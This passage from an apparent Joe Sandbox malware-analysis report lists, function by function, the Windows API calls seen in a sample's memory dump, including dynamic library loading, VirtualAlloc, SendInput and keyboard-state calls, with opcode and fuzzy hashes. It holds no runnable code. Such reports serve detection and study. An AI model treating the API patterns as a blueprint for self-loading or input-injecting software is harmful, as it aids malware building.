                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                        • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                                                                        • API String ID: 2574300362-1816364905
                                                                                                                        • Opcode ID: ce29fc7d16ad69d69e785dadc64e51f4299328910679036135e20d0a0e3af771
                                                                                                                        • Instruction ID: b3cca4edc24f3b2b9d0cc486e6f18a6629b6491f001a8637b7e6e28a9e1ec6d4
                                                                                                                        • Opcode Fuzzy Hash: ce29fc7d16ad69d69e785dadc64e51f4299328910679036135e20d0a0e3af771
                                                                                                                        • Instruction Fuzzy Hash: 84D0A7746083129FD7206F33FC48B4537D4AF04305B14D41DF457F1260DB70D8808620
                                                                                                                        APIs
                                                                                                                        • LoadLibraryA.KERNEL32(oleaut32.dll,00000000,00DD1371,?,00DD1519), ref: 00DD13B4
                                                                                                                        • GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 00DD13C6
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                        • String ID: UnRegisterTypeLibForUser$oleaut32.dll
                                                                                                                        • API String ID: 2574300362-1587604923
                                                                                                                        • Opcode ID: a23baded644f2a5e4864b6d6039686d1fb339059226094ac0a7961f20ffdd357
                                                                                                                        • Instruction ID: 2174f84bed1a96525190699eff73569eea6a0e4d4c3e2b66b4017d491a226161
                                                                                                                        • Opcode Fuzzy Hash: a23baded644f2a5e4864b6d6039686d1fb339059226094ac0a7961f20ffdd357
                                                                                                                        • Instruction Fuzzy Hash: 78D0A734604312BFD7344F35FC0864137E9EB40304F04941EE556F1660DA70C8848720
                                                                                                                        APIs
                                                                                                                        • LoadLibraryA.KERNEL32(oleaut32.dll,?,00DD135F,?,00DD1440), ref: 00DD1389
                                                                                                                        • GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 00DD139B
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                        • String ID: RegisterTypeLibForUser$oleaut32.dll
                                                                                                                        • API String ID: 2574300362-1071820185
                                                                                                                        • Opcode ID: 5a99bb091eb72880e54990208997248788a7d1cf67e1a65295225e958dcb62eb
                                                                                                                        • Instruction ID: 353d5eed32cf5cdbdc4880eb610933cfc99a4d5f40e752d098cce012e98abe1b
                                                                                                                        • Opcode Fuzzy Hash: 5a99bb091eb72880e54990208997248788a7d1cf67e1a65295225e958dcb62eb
                                                                                                                        • Instruction Fuzzy Hash: 37D0A734904322BFD7301F35FC0878137D4EF04304F08841AE486F1651D670D8888720
                                                                                                                        APIs
                                                                                                                        • LoadLibraryA.KERNEL32(advapi32.dll,?,00DF3AC2,?,00DF3CF7), ref: 00DF3ADA
                                                                                                                        • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00DF3AEC
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                        • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                        • API String ID: 2574300362-4033151799
                                                                                                                        • Opcode ID: 77fb73edff30a9dc58d853bd0c67cf01f609e553c491b22e2e1cd56d0d282e41
                                                                                                                        • Instruction ID: 1e57563bdfe69d3cba73c890f4056606a7de066405c29a8caa311e855dd3e313
                                                                                                                        • Opcode Fuzzy Hash: 77fb73edff30a9dc58d853bd0c67cf01f609e553c491b22e2e1cd56d0d282e41
                                                                                                                        • Instruction Fuzzy Hash: 77D0A7706453139FD7208F32FC0E79137D4AB11304B06D419E5D6F1190EFF0C4808620
                                                                                                                        APIs
                                                                                                                        • CharUpperBuffW.USER32(00000000,?,00000000,00000001,00000000,00000000,?,?,00000000,?,?,00DE6AA6), ref: 00D9AB2D
                                                                                                                        • _wcscmp.LIBCMT ref: 00D9AB49
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: BuffCharUpper_wcscmp
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 820872866-0
                                                                                                                        • Opcode ID: 2475afb860887f438c377c253b232c3fb72eca1633cc435f4b027c9206e3d99d
                                                                                                                        • Instruction ID: 03a854836a85cfbbb00c0704b4702c51c83129ea98029ed1cbf190f0ba40668d
                                                                                                                        • Opcode Fuzzy Hash: 2475afb860887f438c377c253b232c3fb72eca1633cc435f4b027c9206e3d99d
                                                                                                                        • Instruction Fuzzy Hash: F0A10376B0010ADBDF14DF69E9816ADBBB1FF44300F65456AE84697290EB30D8A1C7A2
                                                                                                                        APIs
                                                                                                                        • CharLowerBuffW.USER32(?,?), ref: 00DF0D85
                                                                                                                        • CharLowerBuffW.USER32(?,?), ref: 00DF0DC8
                                                                                                                          • Part of subcall function 00DF0458: CharLowerBuffW.USER32(?,?,?,?), ref: 00DF0478
                                                                                                                        • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00DF0FB2
                                                                                                                        • _memmove.LIBCMT ref: 00DF0FC2
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: BuffCharLower$AllocVirtual_memmove
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3659485706-0
                                                                                                                        • Opcode ID: e6767e4875f01004a772b4e254ec49e7556fec40c37a11113bd9e306c8f624c2
                                                                                                                        • Instruction ID: f841355e4fb55b2c1e1059a0a6ee65fae36502957835b026eb6cfba0289c5c9d
                                                                                                                        • Opcode Fuzzy Hash: e6767e4875f01004a772b4e254ec49e7556fec40c37a11113bd9e306c8f624c2
                                                                                                                        • Instruction Fuzzy Hash: 1AB19D716043048FC714DF28C88096ABBE4EF89714F19896EF989DB352DB31ED45CBA1
                                                                                                                        APIs
                                                                                                                        • CoInitialize.OLE32(00000000), ref: 00DEAF56
                                                                                                                        • CoUninitialize.COMBASE ref: 00DEAF61
                                                                                                                          • Part of subcall function 00DD1050: CoCreateInstance.COMBASE(?,00000000,00000005,?,?), ref: 00DD10B8
                                                                                                                        • VariantInit.OLEAUT32(?), ref: 00DEAF6C
                                                                                                                        • VariantClear.OLEAUT32(?), ref: 00DEB23F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 780911581-0
                                                                                                                        • Opcode ID: 0dc6fad31736256ed4b91f196ddd0bf2943212fa66a427be34172ccd2c5d4fb4
                                                                                                                        • Instruction ID: d138e4e9beac960602d5c6cba71d4caf9c454358333f0265561be37c884caad8
                                                                                                                        • Opcode Fuzzy Hash: 0dc6fad31736256ed4b91f196ddd0bf2943212fa66a427be34172ccd2c5d4fb4
                                                                                                                        • Instruction Fuzzy Hash: 4EA126356047419FCB10EF15C891A2AB7E5FF89760F048459FA96AB3A1DB30FD44CBA2
                                                                                                                        APIs
                                                                                                                        • _memmove.LIBCMT ref: 00D9C419
                                                                                                                        • ReadFile.KERNEL32(?,?,00010000,?,00000000,?,?,00000000,?,00DD6653,?,?,00000000), ref: 00D9C495
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FileRead_memmove
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1325644223-0
                                                                                                                        • Opcode ID: d049aeb6f7d6f086feac4a3ac39298e807bfa5cd15e1cac3a55457f0852835f4
                                                                                                                        • Instruction ID: bbafa61695e61f72c4d58a14362e153ca29a85d4465f963dca5c8702cea42905
                                                                                                                        • Opcode Fuzzy Hash: d049aeb6f7d6f086feac4a3ac39298e807bfa5cd15e1cac3a55457f0852835f4
                                                                                                                        • Instruction Fuzzy Hash: A8A1BDB0A04609EBDF04CF69C984BA9FBB0FF05300F14D599E865AB291D735E961CBB1
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _memset$__filbuf__getptd_noexit_memcpy_s
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3877424927-0
                                                                                                                        • Opcode ID: aebda769b95e77701e436127e080a9cadaa2a4c9016d62218a8c9d4b87048a89
                                                                                                                        • Instruction ID: 4463a8c88d49b954bc7cac2a9a3c86b55ceac119b253dbeebb602866f12cca91
                                                                                                                        • Opcode Fuzzy Hash: aebda769b95e77701e436127e080a9cadaa2a4c9016d62218a8c9d4b87048a89
                                                                                                                        • Instruction Fuzzy Hash: 54516F30A00205DBDB24DFA988806EE77E5EF41320F2C8729F867962D2D7B0DD619B70
                                                                                                                        APIs
                                                                                                                        • GetWindowRect.USER32(?,?), ref: 00DFC354
                                                                                                                        • ScreenToClient.USER32(?,00000002), ref: 00DFC384
                                                                                                                        • MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 00DFC3EA
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$ClientMoveRectScreen
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3880355969-0
                                                                                                                        • Opcode ID: c1b71e347a8938a8f017b6364fc80494c9db405592f603554fa052068c4370f6
                                                                                                                        • Instruction ID: 0ef9c247b73c166b359fa585ca071370945c052ba37d58b4a8c1c53fa926b8a3
                                                                                                                        • Opcode Fuzzy Hash: c1b71e347a8938a8f017b6364fc80494c9db405592f603554fa052068c4370f6
                                                                                                                        • Instruction Fuzzy Hash: 47518E3091020CEFCF24CF68C980ABE7BA6FB45360F25C559EA159B290D730ED51CBA0
                                                                                                                        APIs
                                                                                                                        • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00DCD258
                                                                                                                        • __itow.LIBCMT ref: 00DCD292
                                                                                                                          • Part of subcall function 00DCD4DE: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00DCD549
                                                                                                                        • SendMessageW.USER32(?,0000110A,00000001,?), ref: 00DCD2FB
                                                                                                                        • __itow.LIBCMT ref: 00DCD350
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$__itow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3379773720-0
                                                                                                                        • Opcode ID: 891f623ebf1a0b7e2da82d4dc6a7adb614dbcf72be168464ab3692a24dc90a2a
                                                                                                                        • Instruction ID: d8e3ef67bee91b178077301a8d71362c9886d729a4fbfc405fc0c198144c6247
                                                                                                                        • Opcode Fuzzy Hash: 891f623ebf1a0b7e2da82d4dc6a7adb614dbcf72be168464ab3692a24dc90a2a
                                                                                                                        • Instruction Fuzzy Hash: 4C417271A0020AABDF15DF54DC52FEE7BBAEF49700F040029FA06A7191DB749A45CB76
                                                                                                                        APIs
                                                                                                                        • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00DDEF32
                                                                                                                        • GetLastError.KERNEL32(?,00000000), ref: 00DDEF58
                                                                                                                        • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00DDEF7D
                                                                                                                        • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00DDEFA9
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3321077145-0
                                                                                                                        • Opcode ID: da645a77dcb1a69514fbe4afef59c0edff38d1370482c35d4d4047ae39660bf4
                                                                                                                        • Instruction ID: 5527a3ab3ac731190697751e10d078ac928a4ae818a43eae51e9e20cf3e5b29c
                                                                                                                        • Opcode Fuzzy Hash: da645a77dcb1a69514fbe4afef59c0edff38d1370482c35d4d4047ae39660bf4
                                                                                                                        • Instruction Fuzzy Hash: 1C412939600611DFCF10EF15C984A59BBE6EF89720B198489E846AF362CB34FD40DBA1
                                                                                                                        APIs
                                                                                                                        • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00DFB3E1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InvalidateRect
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 634782764-0
                                                                                                                        • Opcode ID: 29faa5425427859b47dc6f8ae8782199ccaf31e8a6d5d042a9a2135ac351cd6b
                                                                                                                        • Instruction ID: b4521078a045ea1c9e05e4f228b50dd96a9d4d4e6d7bab56c6179b33a1ccb3b3
                                                                                                                        • Opcode Fuzzy Hash: 29faa5425427859b47dc6f8ae8782199ccaf31e8a6d5d042a9a2135ac351cd6b
                                                                                                                        • Instruction Fuzzy Hash: 48318E3464420CAFEF249E58DD85BB837A5EB05374F2AC513FB91E62A2C730E9449A71
                                                                                                                        APIs
                                                                                                                        • ClientToScreen.USER32(?,?), ref: 00DFD617
                                                                                                                        • GetWindowRect.USER32(?,?), ref: 00DFD68D
                                                                                                                        • PtInRect.USER32(?,?,00DFEB2C), ref: 00DFD69D
                                                                                                                        • MessageBeep.USER32(00000000), ref: 00DFD70E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1352109105-0
                                                                                                                        • Opcode ID: cdc99622e39171d8b0fb202852344beba14b24dd89bd603f643218e2170a1ea2
                                                                                                                        • Instruction ID: d120e844e4e67d0ee7ea56d36469f38b2841aa91eebae1c4596b0fef39a8289e
                                                                                                                        • Opcode Fuzzy Hash: cdc99622e39171d8b0fb202852344beba14b24dd89bd603f643218e2170a1ea2
                                                                                                                        • Instruction Fuzzy Hash: 94415A30A0021CEFCB15DF59D884BA97BF7BB45311F1A81AAE61AEF251D730E845CB60
                                                                                                                        APIs
                                                                                                                        • GetKeyboardState.USER32(?,76C1C0D0,?,00008000), ref: 00DD44EE
                                                                                                                        • SetKeyboardState.USER32(00000080,?,00008000), ref: 00DD450A
                                                                                                                        • PostMessageW.USER32(00000000,00000101,00000000,?), ref: 00DD456A
                                                                                                                        • SendInput.USER32(00000001,?,0000001C,76C1C0D0,?,00008000), ref: 00DD45C8
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
